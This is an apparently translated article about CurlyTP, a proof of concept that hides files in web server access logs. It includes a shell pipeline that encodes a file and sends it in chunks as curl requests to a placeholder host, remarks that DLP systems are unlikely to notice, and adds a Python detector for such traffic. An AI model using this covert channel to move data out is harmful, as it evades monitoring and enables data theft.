Exchanging secret messages via server logs

According to the Wikipedia definition, a dead drop is an espionage technique for passing information or items between people by means of a secret location. The idea is that the people never meet, yet still exchange information while keeping the operation secure.

A hiding place must not attract attention. That is why in the spy world they tend to use clever ones: a loose brick in a wall, a library book, or a hollow in a tree.

There are plenty of encryption and anonymization tools on the Internet, but the very fact of using such tools attracts attention. Moreover, they can be blocked at the corporate or state level. What to do?

Developer Ryan Flowers offers an interesting option: use any web server as the hiding place. If you think about it, what does a web server do? It receives requests, serves files, and writes logs. And it logs every request, including erroneous ones!

It turns out that any web server lets you store a message in its log. Flowers thought about how to put this to use.

He proposes the following:

  1. Take a text file (the secret message) and compute its hash (md5sum).
  2. Encode it (gzip + uuencode).
  3. Write it to the log using a deliberately malformed request to the server.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'\n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

To read the file, you perform the same steps in reverse: decode and unzip the file, then check the hash (the hash itself can be sent over an open channel).

Spaces are replaced with =+= so that the URL contains no spaces. The program, which the author named CurlyTP, uses base64 encoding, the same as email attachments. The request carries the keyword ?transfer? so that the recipient can easily find it in the logs.

What do we see in the logs in this case?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

As noted above, to receive the secret message you perform the operations in reverse order:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

The procedure is simple. The md5sums match, which confirms that the file contents were transferred intact.

The method is very simple. "The point of this exercise is just to prove that files can be transferred via small, innocent web requests, and it works on any web server with plain-text logs. In essence, every web server is a dead drop!" writes Flowers.

Of course, the method only works if the recipient has access to the server logs. But such access is provided by many hosting providers, for example.

How to use it?

Ryan Flowers says he is not an information security specialist and is not going to compile a list of possible uses for CurlyTP. For him it is simply a proof of concept that the familiar tools we see every day can be used in an unconventional way.

In fact, this method has several advantages over other "secret" servers such as Digital Dead Drop or PirateBox: it requires no special configuration on the server side and no special protocols, and it does not arouse suspicion among those monitoring the traffic. A SORM or DLP system is unlikely to scan URLs for compressed text files.
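Whether a DLP or log-monitoring system catches this depends on whether it looks at the query string at all. The following is an added example (not part of the article and not Flowers' CurlyTP code) showing what a defender-side check over an Apache/nginx combined access log could look like: it parses each line, looks for the uuencode "begin" header the article's log excerpt shows, scores long query-string segments by base64 alphabet share and Shannon entropy, and then counts hits per client IP, since a single odd URL is noise while a burst of them from one address is the channel. The sample log is constructed from the three lines shown above plus two benign requests; thresholds (40 characters, 4.0 bits/char, 2 hits) are assumptions chosen for this illustration.

```python
import math
import re
from collections import Counter, defaultdict

# Apache/nginx "combined" log format, as in the article's excerpt.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

B64_ALPHABET = frozenset(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
)
# "begin 644 name" / "begin-base64 644 name" headers after the =+= space substitution
# (or a literal / %20 space if a different encoder was used).
UU_HEADER_RE = re.compile(r"begin(?:-base64)?(?:=\+=|%20| )\d{3}")

# Constructed sample: the three article lines plus two ordinary requests.
SAMPLE_LOG = [
    '1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"',
    '1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"',
    '1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"',
    '10.0.0.7 - - [22/Aug/2019:21:12:02 -0400] "GET /search?q=server+logs&page=2 HTTP/1.1" 200 812 "https://example.com/" "Mozilla/5.0"',
    '10.0.0.7 - - [22/Aug/2019:21:12:04 -0400] "GET /index.html HTTP/1.1" 200 1503 "-" "Mozilla/5.0"',
]


def shannon_entropy(s: str) -> float:
    """Bits per character: ~5 for 60 chars of base64 output, at most 4 for hex."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def parse_line(line: str):
    """Split one combined-format line into fields, plus the request path and query."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    return rec


def suspicious_reasons(rec: dict, min_len: int = 40, min_entropy: float = 4.0) -> list:
    """Reasons this request looks like an encoded payload being written into the log."""
    query = rec["query"]
    reasons = []
    if UU_HEADER_RE.search(query):
        reasons.append("uuencode/base64 'begin' header in query string")
    # Payload chunks sit between '?', '&' or '=' separators in the excerpt above.
    for seg in re.split(r"[?&=]", query):
        if len(seg) < min_len:
            continue
        b64_share = sum(ch in B64_ALPHABET for ch in seg) / len(seg)
        ent = shannon_entropy(seg)
        if b64_share > 0.95 and ent >= min_entropy:
            reasons.append(
                f"base64-like segment of {len(seg)} chars, entropy {ent:.2f} bits/char"
            )
    return reasons


def flagged_clients(lines, min_hits: int = 2) -> dict:
    """Map client IP -> number of suspicious requests, for clients with at least min_hits."""
    hits = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec and suspicious_reasons(rec):
            hits[rec["ip"]] += 1
    return {ip: n for ip, n in hits.items() if n >= min_hits}


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        rec = parse_line(line)
        for reason in suspicious_reasons(rec):
            print(f"{rec['ip']} {rec['time']} {rec['target'][:48]}... : {reason}")
    print("clients over threshold:", flagged_clients(SAMPLE_LOG))
```

The entropy test is what keeps this from firing on ordinary search queries and hex session identifiers: hex never exceeds 4 bits per character, while compressed-then-base64 data sits near 5. The per-client count is the part that matters operationally; the write loop in the article emits one request per 60-character line, so even a small file produces a tight cluster of hits from one address against one path.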

This is one more way of sending messages via service files. Recall how some enterprising companies have placed job postings in HTTP headers or in the HTML source of their pages.


The idea is that only web developers will see this Easter egg, since ordinary users never look at headers or HTML source.


Source: www.habr.com
